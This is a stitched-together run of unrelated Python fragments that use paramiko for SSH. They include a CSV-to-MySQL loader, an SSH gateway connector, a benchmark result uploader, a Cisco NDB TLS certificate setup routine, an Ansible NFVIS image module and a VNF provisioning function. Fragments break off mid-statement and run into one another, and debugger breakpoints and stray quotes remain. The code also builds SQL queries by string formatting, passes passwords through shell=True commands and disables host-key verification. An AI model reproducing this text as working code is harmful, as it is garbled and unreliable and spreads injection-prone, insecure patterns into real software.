import paramiko as p
import MySQLdb as m
conn = m.connect(host='localhost',
database='mysql',
user='******',
password='******',
port=3000)
cursor = conn.cursor()
ssh = p.SSHClient()
ssh.set_missing_host_key_policy(p.AutoAddPolicy())
ssh.connect(hostname='192.168.209.128',
username='******',
password='******',
port=22)
stdin, stdout, stderr = ssh.exec_command('cat Info.txt')
header = stdout.readline()
data = stdout.readlines()
c = 0
for i in data:
names = i.split(',')[1]
sals = float(i.split(',')[3])
Query = "insert into Info(name,sal) values('%s',%f)" % (names, sals)
cursor.execute(Query)
conn.commit()
c += 1
if c == 1:
print(str(c) + 'st Record inserted successfully')
elif c == 2:
def get_ssh_client(self, asset, system_user):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
sock = None
error = ''
if not system_user.password and not system_user.private_key:
self.get_system_user_auth(system_user, asset)
if asset.domain:
sock = self.get_proxy_sock_v2(asset)
if not sock:
error = 'Connect gateway failed.'
logger.error(error)
try:
try:
ssh.connect(asset.ip,
port=asset.port,
username=system_user.username,
password=system_user.password,
pkey=system_user.private_key,
timeout=config['SSH_TIMEOUT'],
compress=False,
auth_timeout=config['SSH_TIMEOUT'],
look_for_keys=False,
sock=sock)
except paramiko.AuthenticationException:
# 思科设备不支持秘钥登陆,提供秘钥,必然失败
ssh.connect(
asset.ip,
port=asset.port,
username=system_user.username,
password=system_user.password,
timeout=config['SSH_TIMEOUT'],
compress=False,
auth_timeout=config['SSH_TIMEOUT'],
look_for_keys=False,
sock=sock,
allow_agent=False,
)
transport = ssh.get_transport()
transport.set_keepalive(20)
except Exception as e:
password_short = "None"
key_fingerprint = "None"
if system_user.password:
password_short = system_user.password[:5] + \
(len(system_user.password) - 5) * '*'
if system_user.private_key:
key_fingerprint = get_private_key_fingerprint(
system_user.private_key)
logger.error("Connect {}@{}:{} auth failed, password: \
{}, key: {}".format(
system_user.username,
asset.ip,
asset.port,
password_short,
key_fingerprint,
))
error += '\r\n' + str(e) if error else str(e)
return None, None, error
return ssh, sock, None
with strategy.scope():
loss, acc, top_5_acc = model.evaluate(valid, steps=valid_steps)
print("\n")
print("Results:")
print("========\n")
print("ResNet FPS:")
print("*", replicas, "GPU:", int(fps))
print("* Per GPU:", int(fps/replicas))
print("Total train time:", int(train_end-train_start))
print("Acc:", acc, "Top 5 Acc:", top_5_acc)
if args.report:
import paramiko
uid = str(int(time.time()))
result_path = "/home/jovyan/"+uid+"_result.txt"
f = open(result_path,"w+")
f.write("Avg images/sec:"+str(fps))
f.write("\nEnd-to-end time:"+str(train_end-train_start))
f.write("\n")
f.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect("192.168.33.10", username="******", password=os.environ["uat_password"])
sftp = ssh.open_sftp()
sftp.put(result_path, "/home/users/uat/"+uid+"_result.txt")
sftp.close()
ssh.close()
def method_two(self):
try:
with open(INPUTFILE, 'r') as file_ptr:
confi = yaml.load(file_ptr)
self.keystore_password = str(confi['keystore'])
except OSError:
LOGGER.error("Failed to open input yaml file")
self.gen_key_ca = str("openssl req -x509 -nodes -days "+\
self.default_days_str+"0 -newkey rsa:"+
self.default_bits_str+" -out "+\
"./Utilities/TlsCerts/"+\
"mypersonalca/certs/ca.pem \
-outform PEM -keyout ./Utilities/TlsCerts/" +\
"mypersonalca/private/ca.key -batch")
try:
self.gen_key_ca_files_result = call(self.gen_key_ca, \
shell=True, \
stdout=PIPE, \
stderr=STDOUT)
if self.gen_key_ca_files_result == 0:
LOGGER.info("Generate ca.pem and ca.key files success")
else:
LOGGER.error("Failed to Generate ca.pem and "+\
"ca.key files -step5")
sys.exit(0)
except OSError:
LOGGER.error("Failed to Generate ca.pem and ca.key files -step4")
sys.exit(0)
self.gen_cert_key = str("openssl req -new -x509 -days "+\
self.default_days_str+" -nodes -out "+\
"./Utilities/TlsCerts/server.crt -keyout "+\
"./Utilities/TlsCerts/server.key -config "+\
"./Utilities/TlsCerts/ca.conf -batch")
try:
self.gen_cert_key_result = call(self.gen_cert_key, \
shell=True, \
stdout=PIPE, \
stderr=STDOUT)
if self.gen_cert_key_result == 0:
LOGGER.info("Generate server.crt and server.key files success")
else:
LOGGER.error("Failed to Generate server.crt and server.key"+\
" files -step5")
sys.exit(0)
except OSError:
LOGGER.error("Failed to Generate ca.pem and ca.key files -step4")
sys.exit(0)
self.ip = confi['ServerIP']['ServerIP1']['ip']
self.user = confi['ServerIP']['ServerIP1']['user']
self.password = confi['ServerIP']['ServerIP1']['password']
self.path = confi['ServerIP']['ServerIP1']['path_ndb_build']
try:
self.port = confi['ServerIP']['ServerIP1']['port']
except KeyError:
self.port = 0
self.server_ip_list = []
self.server_user_list = []
self.server_password_list = []
self.server_path_list = []
self.server_port_list = []
server_list = sorted(confi['ServerIP'].keys())
for value in server_list:
self.server_ip_list.append(confi['ServerIP']\
[value]['ip'])
self.server_user_list.append(confi['ServerIP']\
[value]['user'])
self.server_password_list.append(confi['ServerIP']\
[value]['password'])
self.server_path_list.append(confi['ServerIP']\
[value]['path_ndb_build'])
str(self.server_password_list)
try:
self.server_port_list.append(confi['ServerIP']\
[value]['port'])
except KeyError:
self.server_port_list.append(0)
self.append_forwkey = 0
while self.append_forwkey < len(self.server_path_list):
suffix = "/"
self.server_path = str(self.server_path_list\
[self.append_forwkey])
if self.server_path.endswith(suffix) == False:
try:
self.server_path = self.server_path + "/"
self.server_path_list[self.append_forwkey] \
= str(self.server_path)
except OSError:
LOGGER.error("Failed to append forward slash"+\
" at end to provided NDB path")
self.append_forwkey += 1
self.app_forwkey_e = 0
while self.app_forwkey_e < len(self.server_path_list):
suffix = "/"
self.server_path = str(self.server_path_list\
[self.app_forwkey_e])
if self.server_path.startswith(suffix) == False:
try:
self.server_path = "/" + self.server_path
self.server_path_list[self.app_forwkey_e] = \
str(self.server_path)
except OSError:
LOGGER.error("Failed to append forward slash"+\
" at start to provided NDB path")
self.app_forwkey_e += 1
self.append_config = 0
while self.append_config < len(self.server_path_list):
suffix = "configuration" + "/"
self.server_path = str(self.server_path_list\
[self.append_config])
if self.server_path.endswith(suffix) == False:
try:
self.server_path = self.server_path + "configuration" + "/"
self.server_path_list[self.append_config] \
= str(self.server_path)
except OSError:
LOGGER.error("Failed to append configuration"+\
" string to provided NDB path")
self.append_config += 1
self.ip = self.server_ip_list[0]
self.user = self.server_user_list[0]
self.password = self.server_password_list[0]
self.path = self.server_path_list[0]
self.port = self.server_port_list[0]
if self.port != 0:
try:
ssh = paramiko.SSHClient()
server = self.ip
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(server,
port=self.port,
username=self.user,
password=self.password)
sftp = ssh.open_sftp()
localpath = './Utilities/TlsCerts/server.crt'
remotepath = '/root/xnc/configuration/server.crt'
sftp.put(localpath, remotepath)
local = './Utilities/TlsCerts/server.key'
remote = '/root/xnc/configuration/server.key'
sftp.put(local, remote)
sftp.close()
except:
LOGGER.error("Error while ssh into the server")
sys.exit(0)
else:
try:
ssh = paramiko.SSHClient()
server = self.ip
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(server, username=self.user, password=self.password)
sftp = ssh.open_sftp()
localpath = './Utilities/TlsCerts/server.crt'
remotepath = self.path + 'server.crt'
sftp.put(localpath, remotepath)
local = './Utilities/TlsCerts/server.key'
remote = self.path + 'server.key'
sftp.put(local, remote)
sftp.close()
except:
LOGGER.error("Error while ssh into the server")
exit(0)
"""
if self.copy_file == 1:
if self.port != 0:
try:
ssh = paramiko.SSHClient()
server = self.ip
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(server, port=self.port, username=self.user, password=self.password)
sftp = ssh.open_sftp()
localpath = './Utilities/TlsCerts/server.key'
remotepath = '/root/xnc/server.key'
sftp.put(localpath, remotepath)
sftp.close()
ssh.close()
except paramiko.SSHException:
LOGGER.error("Error while ssh into the device5")
else:
pass
else:
self.cp_ser_speloc = "cp -r ./Utilities/TlsCerts/server.key "+\
self.path
self.cp_ser_speloc_res = call(str(self.cp_ser_speloc), shell=True)
self.cp_cert_speloc = "cp -r ./Utilities/TlsCerts/server.crt "+\
self.path
self.cp_cert_speloc_res = call(str(self.cp_cert_speloc), \
shell=True)
"""
while (self.log_mul_dev < len(self.device_ip_list)):
self.temp_ip = self.device_ip_list[self.log_mul_dev]
self.temp_user = self.device_user_list[self.log_mul_dev]
self.temp_pass = self.device_password_list[self.log_mul_dev]
self.temp_dport = self.device_port_list[self.log_mul_dev]
child = pexpect.spawn('ssh ' + self.temp_user + '@' + self.temp_ip)
time.sleep(3)
"""
try:
child.expect('login: '******'assword: ')
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided User name is not correct")
sys.exit(0)
child.sendline(self.temp_pass)
time.sleep(3)
try:
child.expect("#")
LOGGER.info("Device "+str(self.temp_ip)+\
" Login success")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided Password is not correct")
sys.exit(0)
child.sendline("configure terminal")
try:
child.expect("#")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" - Unable to configure in device using configuration "+\
"terminal command")
child.sendline("feature nxapi")
try:
child.expect("#")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" - Unable to configure feature "+\
"nxapi command in device")
#pdb.set_trace()
child.sendline("feature sftp-server")
try:
child.expect("#")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" - Unable to configure feature "+\
"sftp-server command in device")
self.sethttps = str("nxapi https port " + str(self.temp_dport))
child.sendline(self.sethttps)
try:
child.expect("#")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" - Unable to set https port "+\
"with provided value in device")
try:
child.logfile = open("./Utilities/TlsCerts/temp/temp.log", "w")
except OSError:
LOGGER.error("Failed to open temporary Log file")
child.sendline("dir bootflash:server.key")
try:
with open("./Utilities/TlsCerts/temp/temp.log", "r") as fp:
for line in fp:
if "server.key" in line:
child.sendline("delete bootflash:server.key")
child.expect("[y]")
child.sendline("y")
break
except OSError:
LOGGER.error("Failed to open temporary Log file")
child.sendline("dir bootflash:server.crt")
try:
with open("./Utilities/TlsCerts/temp/temp.log", "r") as fp1:
for line1 in fp1:
if "server.crt" in line1:
child.sendline("delete bootflash:server.crt")
child.expect("[y]")
child.sendline("y")
break
except OSError:
LOGGER.error("Failed to open temporary Log file")
"""
if self.port != 0:
ssh = paramiko.SSHClient()
server = self.temp_ip
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(server, username=self.temp_user, \
password=self.temp_pass)
sftp = ssh.open_sftp()
localpath = './Utilities/TlsCerts/server.key'
remotepath = 'server.key'
sftp.put(localpath, remotepath)
except paramiko.SSHException:
LOGGER.error("Error while ssh into the device1")
sys.exit(0)
else:
ssh = paramiko.SSHClient()
server = self.temp_ip
#try:
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(server, username=self.temp_user, \
password=self.temp_pass)
sftp = ssh.open_sftp()
localpath = './Utilities/TlsCerts/server.key'
remotepath = 'server.key'
sftp.put(localpath, remotepath)
#except paramiko.SSHException:
# LOGGER.error("Error while ssh into the device2")
# sys.exit(0)
if self.port != 0:
try:
time.sleep(10)
localpath = './Utilities/TlsCerts/server.crt'
remotepath = 'server.crt'
sftp.put(localpath, remotepath)
sftp.close()
ssh.close()
except paramiko.SSHException:
LOGGER.error("Error while ssh into the device")
sys.exit(0)
else:
try:
localpath = './Utilities/TlsCerts/server.crt'
remotepath = 'server.crt'
sftp.put(localpath, remotepath)
sftp.close()
ssh.close()
except paramiko.SSHException:
pass
"""
self.copy_keyfile = str("copy scp://"+self.user+'@'+\
self.ip+self.path+"server.key "+
"bootflash:/// vrf management")
child.sendline(self.copy_keyfile)
try:
child.expect("continue")
child.sendline("yes")
try:
child.expect('assword: ')
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided User name is not correct")
sys.exit(0)
child.sendline(self.password)
try:
child.expect("#")
LOGGER.info("Device "+str(self.temp_ip)+\
" copy server.key file success")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided Password is not correct")
sys.exit(0)
except:
try:
child.expect('assword: ')
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided User name is not correct")
sys.exit(0)
child.sendline(self.password)
try:
child.expect("#")
LOGGER.info("Device "+str(self.temp_ip)+\
" copy server.key file success")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided Password is not correct")
sys.exit(0)
time.sleep(10)
self.cp_certfile = str("copy scp://"+self.user+'@'+\
self.ip+self.path+"server.crt bootflash:/// vrf management")
child.sendline(self.cp_certfile)
try:
child.expect("continue")
child.sendline("yes")
try:
child.expect('assword: ')
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided User name is not correct")
sys.exit(0)
child.sendline(self.password)
try:
child.expect("#")
LOGGER.info("Device "+str(self.temp_ip)+\
" copy server.crt file success")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided Password is not correct")
sys.exit(0)
except:
try:
child.expect('assword: ')
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided User name is not correct")
sys.exit(0)
child.sendline(self.password)
try:
child.expect("#")
LOGGER.info("Device "+str(self.temp_ip)+\
" copy server.crt file success")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" Login incorrect Provided Password is not correct")
sys.exit(0)
time.sleep(10)
child.sendline("configure terminal")
try:
child.expect("#")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" - Unable to configure in device using configuration "+\
"terminal command")
time.sleep(5)
child.sendline("nxapi certificate httpskey " +
"keyfile bootflash:///server.key")
try:
child.expect("#")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" - Unable to configure certificate keyfile "+\
"in device using nxapi certificate httpskey keyfile "+\
"bootflash:///server.key command")
time.sleep(5)
try:
with open("./Utilities/TlsCerts/temp/temp.log", "r") as fp4:
for line4 in fp4:
time.sleep(5)
if "done" and "Upload" and" done" \
and "cert" and "key" and "match" in line4:
break
else:
child.sendline(
"nxapi certificate " +
"httpskey keyfile bootflash:///server.key")
child.expect('#')
break
except OSError:
LOGGER.error("Failed to open temporary Log file")
child.sendline("nxapi certificate httpscrt"+ \
" certfile bootflash:///server.crt")
try:
child.expect("#")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" - Unable to configure certificate certfile "+\
"in device using nxapi certificate httpscrt certfile "+\
"bootflash:///server.crt command")
time.sleep(5)
try:
with open("./Utilities/TlsCerts/temp/temp.log", "r") as fp5:
for line5 in fp5:
time.sleep(5)
if "done" and "Upload" and" done" and "cert" \
and "key" and "match" in line4:
break
else:
child.sendline("nxapi certificate "+\
"httpscrt certfile bootflash:///server.crt")
child.expect('#')
break
except OSError:
LOGGER.error("Failed to open temporary Log file")
child.sendline("nxapi certificate enable")
try:
child.expect("#")
except pexpect.ExceptionPexpect:
LOGGER.error("Device "+str(self.temp_ip)+\
" - Unable to enable certificate "+\
"in device using nxapi certificate enable command")
child.expect([pexpect.EOF, pexpect.TIMEOUT])
self.log_mul_dev += 1
self.cp_keypem = "cp ./Utilities/TlsCerts/server.key "+\
"./Utilities/TlsCerts/xnc-privatekey.pem"
try:
self.cp_keypem_res = call(str(self.cp_keypem), \
shell=True)
if self.cp_keypem_res == 0:
LOGGER.info("Copy server.key file to xnc-privatekey.pem "+\
"file success")
else:
LOGGER.error("Failed to Copy server.key file to "+\
"xnc-privatekey.pem file")
sys.exit(0)
except OSError:
LOGGER.error("Failed to Copy server.key file to "+\
"xnc-privatekey.pem file")
sys.exit(0)
self.cp_certpem = "cp ./Utilities/TlsCerts/server.crt "+\
"./Utilities/TlsCerts/xnc-cert.pem"
try:
self.cp_certpem_res = call(str(self.cp_certpem), \
shell=True)
if self.cp_certpem_res == 0:
LOGGER.info("Copy server.crt file to xnc-cert.pem "+\
"file success")
else:
LOGGER.error("Failed to Copy server.crt file to "+\
"xnc-cert.pem file")
sys.exit(0)
except OSError:
LOGGER.error("Failed to Copy server.crt file to "+\
"xnc-cert.pem file")
sys.exit(0)
self.cp_xncpem = "cat ./Utilities/TlsCerts/xnc-privatekey.pem "+\
"./Utilities/TlsCerts/xnc-cert.pem > ./Utilities/TlsCerts/xnc.pem"
try:
self.cp_xncpem_res = call(str(self.cp_xncpem), \
shell=True)
if self.cp_xncpem_res == 0:
LOGGER.info("Copy xnc-privatekey.pem and xnc-cert.pem "+\
"file to xnc.pem file success")
else:
LOGGER.error("Failed to Copy xnc-privatekey.pem and "+\
"xnc-cert.pem file to xnc.pem file")
sys.exit(0)
except OSError:
LOGGER.error("Failed to Copy xnc-privatekey.pem and "+\
"xnc-cert.pem file to xnc.pem file")
sys.exit(0)
self.pass_pro = "openssl pkcs12 -export -out "+\
"./Utilities/TlsCerts/xnc.p12 "+\
"-in ./Utilities/TlsCerts/xnc.pem -password pass:"******"Generate xnc.p12 file success")
else:
LOGGER.error("Failed to Generate xnc.p12 file -step29")
sys.exit(0)
except OSError:
LOGGER.error("Failed to Generate xnc.p12 file -step29")
sys.exit(0)
self.xncp_tlskey = "keytool -importkeystore -srckeystore "+\
"./Utilities/TlsCerts/xnc.p12 -srcstoretype pkcs12 -destkeystore "+\
"./Utilities/TlsCerts/tlsKeyStore -deststoretype jks -srcstorepass "+\
self.keystore_password+" -deststorepass "+self.keystore_password
try:
self.xncp_tlskey_res = call(str(self.xncp_tlskey), \
shell=True, \
stdout=PIPE, \
stderr=STDOUT)
if self.xncp_tlskey_res == 0:
LOGGER.info("Convert the xnc.p12 to a Java KeyStore "+\
"- tlsKeyStore file success")
else:
LOGGER.error("Failed to Convert the xnc.p12 to a Java "+\
"KeyStore (tlsKeyStore) file -step31")
sys.exit(0)
except OSError:
LOGGER.error("Failed to Convert the xnc.p12 to a Java "+\
"KeyStore (tlsKeyStore) file -step31")
sys.exit(0)
self.capem_sw = "cp ./Utilities/TlsCerts/mypersonalca/certs/ca.pem "+\
"./Utilities/TlsCerts/sw-cacert.pem"
try:
self.capem_sw_res = call(str(self.capem_sw), shell=True)
if self.capem_sw_res == 0:
LOGGER.info("Copy ca.pem file to sw-cacert.pem file success")
else:
LOGGER.error("Failed to Copy xnc-privatekey.pem and "+\
"xnc-cert.pem file to xnc.pem file")
sys.exit(0)
except OSError:
LOGGER.error("Failed to Copy xnc-privatekey.pem and "+\
"xnc-cert.pem file to xnc.pem file")
sys.exit(0)
self.sw_tlstrust = "keytool -import -alias swca1 -file "+\
"./Utilities/TlsCerts/sw-cacert.pem -keystore ./Utilities/TlsCerts/tlsTrustStore "+\
"-storepass "+self.keystore_password+" -noprompt"
try:
self.sw_tlstrust_res = call(str(self.sw_tlstrust), \
shell=True, \
stdout=PIPE, \
stderr=STDOUT)
if self.sw_tlstrust_res == 0:
LOGGER.info("Convert the sw-cacert.pem file to a Java "+\
"TrustStore - tlsTrustStore file success")
else:
LOGGER.error("Failed to Convert the sw-cacert.pem to a "+\
"Java TrustStore - tlsTrustStore file -step34")
sys.exit(0)
except OSError:
LOGGER.error("Failed to Convert the sw-cacert.pem to a "+\
"Java TrustStore - tlsTrustStore file -step34")
sys.exit(0)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.login_mulser = 0
self.tem_serip = ""
self.tem_seruser = ""
self.temp_serpass = ""
self.tem_serpath = ""
while (self.login_mulser < len(self.server_ip_list)):
self.tem_serip = self.server_ip_list[self.login_mulser]
self.tem_seruser = self.server_user_list[self.login_mulser]
self.temp_serpass = self.server_password_list[self.login_mulser]
self.tem_serpath = self.server_path_list[self.login_mulser]
self.tem_port = self.server_port_list[self.login_mulser]
xnc_path = self.tem_serpath[:-14]
#pdb.set_trace()
if self.tem_port != 0:
try:
ssh = paramiko.SSHClient()
server = self.tem_serip
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(server,
port=self.tem_port,
username=self.tem_seruser,
password=self.temp_serpass)
sftp = ssh.open_sftp()
localpath = './Utilities/TlsCerts/tlsTrustStore'
remotepath = '/root/xnc/configuration/tlsTrustStore'
sftp.put(localpath, remotepath)
local = './Utilities/TlsCerts/tlsKeyStore'
remote = '/root/xnc/configuration/tlsKeyStore'
sftp.put(local, remote)
sftp.close()
except paramiko.SSHException:
LOGGER.error("Error while ssh into the server")
sys.exit(0)
else:
try:
ssh = paramiko.SSHClient()
server = self.tem_serip
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(server,
username=self.tem_seruser,
password=self.temp_serpass)
sftp = ssh.open_sftp()
localpath = './Utilities/TlsCerts/tlsTrustStore'
remotepath = self.tem_serpath + 'tlsTrustStore'
sftp.put(localpath, remotepath)
local = './Utilities/TlsCerts/tlsKeyStore'
remote = self.tem_serpath + 'tlsKeyStore'
sftp.put(local, remote)
sftp.close()
except paramiko.SSHException:
LOGGER.error("Error while ssh into the server")
exit(0)
time.sleep(5)
#pdb.set_trace()
self.run_ndb = 'cd '+xnc_path+' ;./runxnc.sh -tls '+\
'-tlskeystore ./configuration/tlsKeyStore -tlstruststore '+\
'./configuration/tlsTrustStore'
self.run_n = str(self.run_ndb)
if self.tem_port != 0:
self.run_n += '\n'
try:
chan = ssh.invoke_shell()
chan.send(self.run_n)
except OSError:
LOGGER.error("Server "+self.tem_serip+" Failed Run NDB"+\
" in TLS mode")
sys.exit(0)
else:
try:
stdin, stdout, stderr = ssh.exec_command(self.run_n)
LOGGER.info("Server "+self.tem_serip+" Run NDB in TLS"+\
" mode success")
except OSError:
LOGGER.error("Server "+self.tem_serip+" Failed Run NDB"+\
" in TLS mode")
sys.exit(0)
time.sleep(10)
flag = True
timeout = time.time() + 60 * 5
while (flag):
if time.time() <= timeout:
if self.tem_port != 0:
try:
ssh = paramiko.SSHClient()
server = self.tem_serip
ssh.set_missing_host_key_policy(
paramiko.AutoAddPolicy())
ssh.connect(server,
port=self.tem_port,
username=self.tem_seruser,
password=self.temp_serpass)
sftp = ssh.open_sftp()
localpath = '/root/xnc/logs/xnc.log'
remotepath = './Utilities/TlsCerts/xnc.log'
sftp.put(localpath, remotepath)
local = '/root/xnc/logs/xnc.log'
remote = './Utilities/TlsCerts/xnc.log'
sftp.put(local, remote)
sftp.close()
except OSError:
LOGGER.error("Error while ssh into the server")
sys.exit(0)
else:
try:
#pdb.set_trace()
ssh = paramiko.SSHClient()
server = self.tem_serip
ssh.set_missing_host_key_policy(
paramiko.AutoAddPolicy())
ssh.connect(server,
username=self.tem_seruser,
password=self.temp_serpass)
sftp = ssh.open_sftp()
localpath = xnc_path + 'logs/xnc.log'
remotepath = './Utilities/TlsCerts/xnc.log'
sftp.get(localpath, remotepath)
local = xnc_path + 'logs/xnc.log'
remote = './Utilities/TlsCerts/xnc.log'
sftp.get(local, remote)
sftp.close()
except OSError:
LOGGER.error("Error while ssh into the server11")
exit(0)
try:
with open("./Utilities/TlsCerts/xnc.log",
'r') as fil_ptr:
for line in fil_ptr:
if 'Started \'Cisco Extensible Network Controller (XNC)\' version' in line:
flag = False
break
else:
flag = True
continue
except OSError:
LOGGER.error("Failed to open xnc log file")
sys.exit(0)
else:
LOGGER.error("Failed to start NDB in TLS mode")
sys.exit(0)
time.sleep(15)
pdb.set_trace()
self.prov_pass = '******'+xnc_path+'bin/ ;./xnc '+\
'config-keystore-passwords --user admin '+\
'--password admin --url https://'+self.tem_serip+\
':8443 --verbose --keystore-password '+self.keystore_password+\
' --truststore-password '+self.keystore_password
self.prov_pass_b = str(self.prov_pass)
if self.tem_port == 0:
try:
stdin, stdout, stderr = ssh.exec_command(self.prov_pass_b)
LOGGER.info("Server "+self.tem_serip+" Run command of "+\
"provided TLSKeyStore and TrustStore success")
except OSError:
LOGGER.error("Server "+self.tem_serip+" Failed to Run "+\
"command of provided TLSKeyStore and TrustStore")
sys.exit(0)
else:
self.prov_pass_b += '\n'
try:
chan = ssh.invoke_shell()
chan.send(self.prov_pass_b)
except OSError:
LOGGER.error("Server "+self.tem_serip+" Failed to Run "+\
"command of provided TLSKeyStore and TrustStore")
sys.exit(0)
time.sleep(10)
self.login_mulser += 1
ssh.close()
def run_module():
# define available arguments/parameters a user can pass to the module
argument_spec = nfvis_argument_spec()
argument_spec.update(
state=dict(type='str',
choices=['absent', 'present'],
default='present'),
name=dict(type='str', required=True),
file=dict(type='str', required=True),
dest=dict(type='str', default='/data/intdatastore/uploads'),
)
# seed the result dict in the object
# we primarily care about changed and state
# change is if this module effectively modified the target
# state will include any data that you want your module to pass back
# for consumption, for example, in a subsequent task
result = dict(changed=False, original_message='', message='')
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
nfvis = nfvisModule(module)
if not HAS_PARAMIKO:
nfvis.fail_json(
msg=
'library paramiko is required when file_pull is False but does not appear to be '
'installed. It can be installed using `pip install paramiko`')
if not HAS_SCP:
nfvis.fail_json(
msg=
'library scp is required when file_pull is False but does not appear to be '
'installed. It can be installed using `pip install scp`')
# Get the list of existing packages
response = nfvis.request('/config/vm_lifecycle/images?deep')
nfvis.result['current'] = response
# Turn the list of dictionaries returned in the call into a dictionary of dictionaries hashed by the deployment name
images_dict = {}
try:
for item in response['vmlc:images']['image']:
name = item['name']
images_dict[name] = item
except TypeError:
pass
except KeyError:
pass
if nfvis.params['state'] == 'present':
if nfvis.params['name'] not in images_dict:
if not module.check_mode:
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.load_system_host_keys()
ssh.connect(hostname=module.params['host'],
port=22222,
username=module.params['user'],
password=module.params['password'],
look_for_keys=False,
timeout=module.params['timeout'])
except paramiko.AuthenticationException:
nfvis.fail_json(
msg=
'Authentication failed, please verify your credentials'
)
except paramiko.SSHException as sshException:
nfvis.fail_json(
msg='Unable to establish SSH connection: %s' %
sshException)
except paramiko.BadHostKeyException as badHostKeyException:
nfvis.fail_json(
msg='Unable to verify servers host key: %s' %
badHostKeyException)
except Exception as e:
nfvis.fail_json(msg=e.args)
try:
with SCPClient(ssh.get_transport()) as scp:
scp.put(
module.params['file'],
'/data/intdatastore/uploads/{0}.tar.gz'.format(
nfvis.params['name']))
except Exception as e:
nfvis.fail_json(msg="Operation error: %s" % e)
scp.close()
payload = {'image': {}}
payload['image']['name'] = nfvis.params['name']
payload['image']['src'] = 'file://{0}/{1}.tar.gz'.format(
nfvis.params['dest'], nfvis.params['name'])
url_path = '/config/vm_lifecycle/images'
if not module.check_mode:
response = nfvis.request(url_path,
method='POST',
payload=json.dumps(payload))
nfvis.result['changed'] = True
else:
if nfvis.params['name'] in images_dict:
# Delete the image
url_path = '/config/vm_lifecycle/images/image/{0}'.format(
nfvis.params['name'])
if not module.check_mode:
response = nfvis.request(url_path, method='DELETE')
# Delete the file
filename = (
images_dict[nfvis.params['name']]['src'].split('://'))[1]
payload = {'input': {'name': filename}}
url_path = '/operations/system/file-delete/file'
if not module.check_mode:
response = nfvis.request(url_path,
method='POST',
payload=json.dumps(payload))
nfvis.result['changed'] = True
else:
nfvis.result['changed'] = False
nfvis.exit_json(**nfvis.result)
def ssh_execution(self, function, host_ip):
LOG.info("Executing ssh connection with function: %s", function)
num_retries = 20
ssh = paramiko.SSHClient()
LOG.info("SSH client start for user %s", self.username)
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.load_system_host_keys()
retry = 0
while retry < num_retries:
try:
# ssh.connect(host_ip, username = self.username, pkey = self.private_key)
ssh.connect(host_ip,
username=self.username,
password=self.password)
break
except paramiko.BadHostKeyException:
LOG.info(
"%s has an entry in ~/.ssh/known_hosts and it doesn't match"
% self.server.hostname)
retry += 1
except EOFError:
LOG.info(
'Unexpected Error from SSH Connection, retry in 5 seconds')
time.sleep(10)
retry += 1
except:
LOG.info(
'SSH Connection refused from %s, will retry in 5 seconds',
host_ip)
time.sleep(10)
retry += 1
if retry == num_retries:
LOG.info('Could not establish SSH connection within max retries')
return
if function == 0:
LOG.info("SSH connection established")
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo service squid start')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
LOG.info('output from remote: ' + str(ssh_stderr))
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo mv /opt/monitoring /opt/Monitoring')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
LOG.info('output from remote: ' + str(ssh_stderr))
retry = 0
if self.with_monitoring == True:
ftp = ssh.open_sftp()
LOG.info("SFTP connection established")
self.createConf(host_ip, 4, 'cache-vnf')
localpath = self.monitoring_file
LOG.info("SFTP connection entering on %s", localpath)
remotepath = '/tmp/node.conf'
sftpa = ftp.put(localpath, remotepath)
ftp.close()
LOG.info("SSH connection reestablished")
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo cp /tmp/node.conf /opt/Monitoring')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
